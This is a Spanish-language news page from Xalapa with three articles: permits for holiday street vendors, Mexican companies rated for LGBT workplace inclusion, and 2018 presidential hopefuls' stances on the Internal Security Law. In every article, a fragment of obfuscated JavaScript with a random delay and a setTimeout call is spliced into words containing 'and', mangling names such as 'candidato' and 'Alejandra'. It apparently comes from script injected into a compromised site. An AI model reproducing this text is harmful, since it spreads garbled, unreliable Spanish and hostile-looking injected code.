Otorga Ayuntamiento 120 permisos a comerciantes por temporada decembrina

Alejandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andra Huerta. Xalapa. La subdirección de comercio en Xalapa autorizó 120 puestos en diversos puntos de la ciudad, pero sobre todo en la zona centro para la venta de artículos navideños.

La titular del área, Clorinda Ferral Ferrandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}ando, declaró que todos los comerciantes que se encuentran en la vía pública durante esta temporada, ya contaban con la boleta de pago ante la dirección de Ingresos, y es por ello que se les permitió realizar su venta sin problemas.

En entrevista dejo en claro que para aquellos que no lograron sus permisos de venta, deberán de retirarse de la vía pública, pues de no hacerlo tendrán que ser invitados por el personal de Inspección de la subdirección.

Indicó que ellos, como autoridad municipal, estarán atentos de vigilar que se cumpla con la normatividad y aplicar el recalentó para aquellos que se instalen sin el debido permiso.

“Ya hemos venido haciendo este operativo, el cual comenzó el primero de diciembre, ya hemos trabajado retirandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}ando y apercibiendo”.

Este retiro, dijo Clorinda Ferral, se ha realizado en la zona cómo Animas, Central de Abastos y Arco Sur.

“Es en esa zonas donde hemos estado trabajandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}ando de forma más intensificada y efectivamente en la zona Centro”, comentó.

La subdirectora de comercio comentó que le han llegado reportes a través de las redes sociales así como quejas directas, las cuales se han atendido de forma inmediata por medio de los operativos.

Empresas de México destacan en inclusión laboral de la comunidad LGBT
México. Durante el 2017, 32 empresas cumplieron con todos los requisitos de la Fundación “Human Rights Campaign” (HRC) para calificar entre las empresas interesadas en alinear sus políticas corporativas de diversidad e inclusión LGBT a estándares internacionales.

E acuerdo con el reporte de “HRC Equidad MX: Programa Global de Equidad Laboral 2018”, el cual se realiza con él fin de promover la conciencia sobre la importancia de la diversidad e inclusión LGBT en los lugares, México avanza en la materia, sumandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}ando 530 mil colaboradores.

A continuación la lista de las empresas que cumplen con los requisitos para la calificación:

Accenture México (Accenture)
American Express Company (México), S.A. de
C.V. (American Express)
AT&T, México (AT&T)
Cinépolis de México (Cinépolis)
Grupo Financiero Banamex, S.A. de C.V. (Citibanamex)
CompuCom México (CompuCom)
Dow Quimica Mexicana, S.A. de C.V. (DOW)
Edelman México, S.A de C.V (Edelman)
EY (EY)
Ford Motor Company (Ford)
GE México, S.A. de C.V. (General Electric)
Google México (Google)
Herman Miller México, S.A. de C.V. (Herman Miller)
IBM de México (IBM)
JP Morgan Grupo Financiero, S.A. de C.V (J.P. Morgan)
Kellogg Company (Kellogg)
Lubrizol Servicios Técnicos, S de R.L. de C.V.
(Lubrizol)
Mastercard México (Mastercard)
Nielsen México (Nielsen)
PayPal México (PayPal)
Petróleos Mexicanos (PEMEX) y sus empresas
productivas subsidiarias (PEMEX)
PepsiCo México – PepsiCo Internacional
México, S. de R.L. de C.V. (PepsiCo)
Pfizer de México (Pfizer)
P&G México (Procter & Gamble)
SAP México, S.A. de C.V. (SAP)
Scotiabank Inverlat, S.A. (Scotiabank)
SODEXO México (Sodexo)
TE Connectivity México (TE Connectivity)
The Boston Consulting Group (The Boston
Consulting Group)
UBER México Technology & Software (Uber)
Unilever de México (Unilever)
Walmart de México y Centroamérica (Walmart)

Ley de Seguridad Interior genera polémica entre presidenciables
México. La recién aprobada por la Cámara de Diputados, Ley de Seguridad Interior, la cual pretende regula las acciones de las Fuerzas Armadas en el país, ha generado cierta controversia en el país.

Por su parte los aspirantes a la Presidencia de la República, han reaccionado al respecto; algunos han manifestado rechazo y algunos otros la consideran necesaria y urgente.

De acuerdo con una publicación de “Nación321”, la candom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andidata independiente Margarita Zavala, dejó ver cierta simpatía con la Ley, al manifestar vía twitter que “Urge un gobierno valiente que defienda a los ciudadanos”

“Seguimos necesitandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}ando a nuestros soldados y marinos porque el gobierno abandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andonó el fortalecimiento de las policías. Urge un gobierno valiente que defienda a los ciudadanos. #LeydeSeguridadInterior”, publicó la aspirante que hasta momento cuenta con 313 mil firmas.

En el caso de Andrés Manuel López Obrador, candom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andidato de Morena, éste tiene clara su postura de rechazo a dicha Ley.

“Se puede integrar una Guardia Nacional para que todos, de manera coordinada, enfrenten el grave problema de la seguridad y la violencia, ya está en la Constitución, es cosa de aplicarlo”, publicó “Nación321”.

Por su parte, el candom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andidato del PRI, José Antonio Meade, manifestó que la Ley es favorable, y la consideró como un paso adelante en materia de Seguridad.

“En términos de construir una nueva forma de interactuar entre las fuerzas de seguridad y los estados”.

Para Jaime Rodríguez “El Bronco”, la Ley de Seguridad Interior es la mejor opción, incluso criticó a los que no la avalan, poniendo como ejemplo a Andrés Manuel López Obrador.

“Los críticos del Ejército dicen: no, queremos que se queden en los cuarteles, y esos cabrones no quieren ser policías. Me gustaría que Andrés Manuel se metiera de policía o me gustaría que los críticos del Ejército se metan de policías”, criticó en independientes que hasta el momento tiene 618 mil firmas

Para el actual jefe de gobierno, Miguel Ángel Mancera y posible candom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andidato por el Frente Ciudadano, la Ley no es viable, ya que al país “no le conviene militarizarse de ninguna manera”.

“México no es un País que deba estar militarizado, ahora debido a que no se construyó policía en este País, es indispensable que estén nuestras Fuerzas Armadas realizandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}ando estas tareas”.

Para el otro posible candom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andidato por el Frente Ciudadano, Ricardo Anaya, la Ley de Seguridad Interior es la oportunidad para que las policías reasuman sus funciones constitucionales.

“De manera francamente autoritaria, el PRI desechó la Ley de Mandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}ando Mixto, que lo que establecía, entre otras cosas, plazos, términos, condiciones, para que las policías locales reasuman sus funciones constitucionales”.

Deja un comentario

Tu dirección de correo electrónico no será publicada.

Back to top button
Close